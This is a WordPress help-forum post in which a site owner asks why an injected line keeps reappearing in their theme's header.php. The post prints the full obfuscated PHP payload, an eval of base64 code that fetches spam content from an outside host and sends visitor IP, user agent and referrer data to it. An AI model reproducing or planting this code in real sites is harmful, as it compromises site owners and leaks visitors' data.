My WP 2.7 site gets Hacked
-
Hi,
I noticed that my WP site got hacked and that if I read the source code a huge number of viagra links started appearing. The browser renders the site normally and only if you view the generated source, you can see the links.
I discovered that the problem lies with the header.php file of my theme. The following line got appended at the end of the file:
<?php eval(base64_decode(‘CmZ1bmN0aW9uIGc4NzQ2MjgzNDcyMzQoJHUsICRwID0gYXJyYXkgKCkpIHsKICAgICRjID0gY3VybF9pbml0KCk7CiAgICBjdXJsX3NldG9wdCgkYywgQ1VSTE9QVF9VUkwsICR1KTsKICAgIGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsKICAgIGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX1RJTUVPVVQsIDMwKTsKICAgICRoID0gY3VybF9leGVjKCRjKTsKICAgIGN1cmxfY2xvc2UgKCRjKTsKICAgIHJldHVybiAkaDsKfQoKaWYgKHN1YnN0cigkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSwgMCwgOSkgPT0gJy9wYWdlLnBocCcpIHsKICAgIG9iX2VuZF9jbGVhbigpOwoKICAgIGVjaG8gZzg3NDYyODM0NzIzNCgiaHR0cDovL3d3dy5teXdlYi1zdGF0aXN0aWNzLmNuL2dldC5waHA/aT0iIC4gdXJsZW5jb2RlKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSAuICImaD0iIC4gcmF3dXJsZGVjb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkgLiAiJmE9MSZpZD0iIC4gdXJsZW5jb2RlKHN1YnN0cigkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSwgMTMpKSAuICImbT0iIC4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkgLiAiJmw9IgogICAgICAgIC4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0FDQ0VQVF9MQU5HVUFHRSddKSAuICImdT0iIC4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgLiAiJnI9IiAuIHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pKTsKCiAgICBleGl0Owp9IGVsc2UgewogICAgZWNobyBnODc0NjI4MzQ3MjM0KCJodHRwOi8vd3d3Lm15d2ViLXN0YXRpc3RpY3MuY24vZ2V0LnBocD9pPSIgLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10pIC4gIiZsPSIgLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfQUNDRVBUX0xBTkdVQUdFJ10pIC4gIiZoPSIgLiByYXd1cmxkZWNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKSAuICImbT0iIC4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkgLiAiJnU9IgogICAgICAgIC4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgLiAiJnI9IiAuIHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pKTsKfQ==’)); ?>I deleted the offending line and everything was fine. After 2 days the offending line “appeared” again. The file rights are 644. Does anyone know how this thing gets generated??
Thanks in advace
- The topic ‘My WP 2.7 site gets Hacked’ is closed to new replies.